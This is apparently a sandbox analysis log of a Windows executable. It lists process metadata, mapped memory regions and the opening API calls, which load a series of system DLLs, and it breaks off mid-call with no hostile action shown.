# Flog Txt Version 1 # Analyzer Version: 4.5.0 # Analyzer Build Date: Apr 22 2022 21:04:16 # Log Creation Date: 04.05.2022 15:19:12.367 Process: id = "1" image_name = "bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" page_root = "0x6dc61000" os_pid = "0xf00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x78c" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 121 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 122 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 123 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 124 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 125 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 126 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 127 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 128 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 129 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 130 start_va = 0x400000 end_va = 0x43bfff monitored = 1 entry_point = 0x4034f7 region_type = mapped_file name = "bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe") Region: id = 131 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 132 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 134 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 135 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 136 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 275 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 276 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 277 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 278 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 280 start_va = 0x440000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 281 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 282 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 284 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 285 start_va = 0x610000 end_va = 0x6cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 287 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 288 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 289 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 290 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 291 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 292 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 293 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 294 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 295 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 296 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 297 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 298 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 299 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 300 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 301 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 302 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 303 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 304 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 305 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 306 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 307 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 308 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 309 start_va = 0x6ea30000 end_va = 0x6eac1fff monitored = 0 entry_point = 0x6ea3dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 310 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 311 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 312 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 313 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 314 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 315 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 316 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 317 start_va = 0xaf0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 318 start_va = 0x1ef0000 end_va = 0x1f80fff monitored = 0 entry_point = 0x1f28cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 319 start_va = 0x1ef0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 320 start_va = 0x740b0000 end_va = 0x74124fff monitored = 0 entry_point = 0x740e9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 321 start_va = 0x1ef0000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 322 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 323 start_va = 0x6ea10000 end_va = 0x6ea28fff monitored = 0 entry_point = 0x6ea147e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 324 start_va = 0x74890000 end_va = 0x74c9afff monitored = 0 entry_point = 0x748badf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 325 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 326 start_va = 0x72450000 end_va = 0x7259afff monitored = 0 entry_point = 0x724b1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 327 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 328 start_va = 0x74090000 end_va = 0x740acfff monitored = 0 entry_point = 0x74093b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 329 start_va = 0x6e520000 end_va = 0x6e573fff monitored = 0 entry_point = 0x6e53dc50 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 330 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 331 start_va = 0x74d20000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d46220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 332 start_va = 0x6e9e0000 end_va = 0x6ea07fff monitored = 0 entry_point = 0x6e9e7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 333 start_va = 0x6e830000 end_va = 0x6e837fff monitored = 0 entry_point = 0x6e8317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 334 start_va = 0x6e510000 end_va = 0x6e515fff monitored = 0 entry_point = 0x6e511570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 335 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 336 start_va = 0x20d0000 end_va = 0x2406fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 337 start_va = 0x590000 end_va = 0x593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 338 start_va = 0x5a0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 339 start_va = 0x1ef0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 340 start_va = 0x2050000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 341 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 342 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 343 start_va = 0x1ff0000 end_va = 0x1ff3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 344 start_va = 0x2000000 end_va = 0x2016fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 345 start_va = 0x2020000 end_va = 0x2020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 346 start_va = 0x2060000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 347 start_va = 0x2410000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 348 start_va = 0x2510000 end_va = 0x2d1dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 349 start_va = 0x6e480000 end_va = 0x6e500fff monitored = 0 entry_point = 0x6e486310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 350 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 351 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 352 start_va = 0x6e460000 end_va = 0x6e475fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 353 start_va = 0x6e420000 end_va = 0x6e450fff monitored = 0 entry_point = 0x6e4322d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 354 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 355 start_va = 0x1ff0000 end_va = 0x1ff0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 356 start_va = 0x2d20000 end_va = 0x2ddbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d20000" filename = "" Region: id = 357 start_va = 0x1ff0000 end_va = 0x1ff3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 358 start_va = 0x2030000 end_va = 0x2031fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002030000" filename = "" Region: id = 359 start_va = 0x2040000 end_va = 0x2040fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 360 start_va = 0x20a0000 end_va = 0x20a4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 361 start_va = 0x2510000 end_va = 0x2d14fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 362 start_va = 0x2510000 end_va = 0x2d14fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 363 start_va = 0x2510000 end_va = 0x2d1afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 364 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0x3f8 [0112.320] SetErrorMode (uMode=0x8001) returned 0x0 [0112.342] GetVersionExW (in: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fe40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0112.342] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74580000 [0112.342] GetProcAddress (hModule=0x74580000, lpProcName="SetDefaultDllDirectories") returned 0x77556270 [0112.343] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0112.343] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.343] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0112.346] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll", hFile=0x0, dwFlags=0x8) returned 0x740b0000 [0113.573] lstrlenA (lpString="UXTHEME") returned 7 [0113.573] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.574] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\USERENV.dll") returned 12 [0113.574] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\USERENV.dll", hFile=0x0, dwFlags=0x8) returned 0x6ea10000 [0114.048] lstrlenA (lpString="USERENV") returned 7 [0114.048] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.048] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0114.049] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x74890000 [0115.046] lstrlenA (lpString="SETUPAPI") returned 8 [0115.046] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.046] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\APPHELP.dll") returned 12 [0115.046] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\APPHELP.dll", hFile=0x0, dwFlags=0x8) returned 0x744b0000 [0115.652] lstrlenA (lpString="APPHELP") returned 7 [0115.652] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.652] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\PROPSYS.dll") returned 12 [0115.652] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\PROPSYS.dll", hFile=0x0, dwFlags=0x8) returned 0x72450000 [0116.621] lstrlenA (lpString="PROPSYS") returned 7 [0116.621] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.621] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\DWMAPI.dll") returned 11 [0116.621] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\DWMAPI.dll", hFile=0x0, dwFlags=0x8) returned 0x74090000 [0116.998] lstrlenA (lpString="DWMAPI") returned 6 [0116.998] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.999] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CRYPTBASE.dll") returned 14 [0116.999] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CRYPTBASE.dll", hFile=0x0, dwFlags=0x8) returned 0x74550000 [0116.999] lstrlenA (lpString="CRYPTBASE") returned 9 [0116.999] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0116.999] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\OLEACC.dll") returned 11 [0116.999] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\OLEACC.dll", hFile=0x0, dwFlags=0x8) returned 0x6e520000 [0117.595] lstrlenA (lpString="OLEACC") returned 6 [0117.595] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0117.595] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\CLBCATQ.dll") returned 12 [0117.595] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\CLBCATQ.dll", hFile=0x0, dwFlags=0x8) returned 0x74d20000 [0117.996] lstrlenA (lpString="CLBCATQ") returned 7 [0117.997] GetSystemDirectoryW (in: lpBuffer=0x19f938, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0117.997] wsprintfW (in: param_1=0x19f95e, param_2="%s%S.dll" | out: param_1="\\NTMARTA.dll") returned 12 [0117.997] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\NTMARTA.dll", hFile=0x0, dwFlags=0x8) returned 0x6e9e0000 [0118.377] lstrlenA (lpString="NTMARTA") returned 7 [0118.377] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0118.377] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0118.377] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\VERSION.dll") returned 12 [0118.377] LoadLibraryExW 